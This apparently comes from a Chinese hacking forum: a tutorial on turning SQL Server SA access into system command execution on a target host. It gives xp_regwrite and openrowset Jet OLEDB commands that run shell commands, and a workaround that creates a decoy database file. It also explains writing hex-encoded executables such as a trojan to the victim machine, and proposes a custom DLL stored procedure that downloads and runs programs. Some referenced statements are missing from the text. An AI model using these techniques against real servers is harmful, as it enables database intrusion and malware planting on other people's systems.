以下方法都以需要SA權(quán)限為前提。
1, 沙盒模式的變通.

原始方法:
第一句開啟沙盤模式：exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
復(fù)制代碼第二句利用jet.oledb執(zhí)行系統(tǒng)命令：select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("CMD命令")’)
復(fù)制代碼或select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\ias.mdb’,’select shell("CMD命令")’)
復(fù)制代碼但是,當(dāng) X:\Windows\System32\ias\dnary.mdb 或 X:\Windows\System32\ias\ias.mdb 被刪除時(shí),命令就會(huì)無效了.
所以利用以下語句創(chuàng)建一個(gè)數(shù)據(jù)庫：(數(shù)據(jù)庫名SysSetup.xml,后綴.xml是自定義,不影響使用.)


然后再利用jet.oledb調(diào)用SysSetup.xml執(zhí)行系統(tǒng)命令：select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=SysSetup.xml’,’select shell("CMD命令")’)


2, 直接寫入文件到對(duì)方計(jì)算機(jī),此處的文件可以是exe, dll,等.(注,此方法不支持文件大于64KB)
當(dāng)已經(jīng)有一個(gè)程序需要放到對(duì)方計(jì)算機(jī)的時(shí)候.(例如, 放MA。)
將這個(gè)文件轉(zhuǎn)成HEX代碼。
如果不知道怎么把文件轉(zhuǎn)成HEX代碼,請(qǐng)使用下面的工具.
File2Hex.rar (424 Bytes)

使用方法很簡(jiǎn)單, 解壓出來之后, 把要轉(zhuǎn)的文件拖到腳本上去, 就會(huì)生成包含HEX代碼的文本.
然后用以下方法寫入到對(duì)方計(jì)算機(jī)中。



寫入之后, 就發(fā)揮你的辦法去執(zhí)行你寫入的這個(gè)文件就OK了。

集思廣益：
現(xiàn)在很多計(jì)算機(jī)可以執(zhí)行命令的方法都被人封得抓狂,就算有幸可以執(zhí)行,也有可能CMD被改了權(quán)限..
所以我推薦的辦法是有能力的同學(xué)自己開發(fā)DLL,然后把DLL寫入到對(duì)方計(jì)算機(jī)中,再注冊(cè)為存儲(chǔ)過程.
至于存儲(chǔ)過程的功能. 可以是下載程序并執(zhí)行, 可以是直接執(zhí)行命令. 當(dāng)然這個(gè)看你自己了.

最新評(píng)論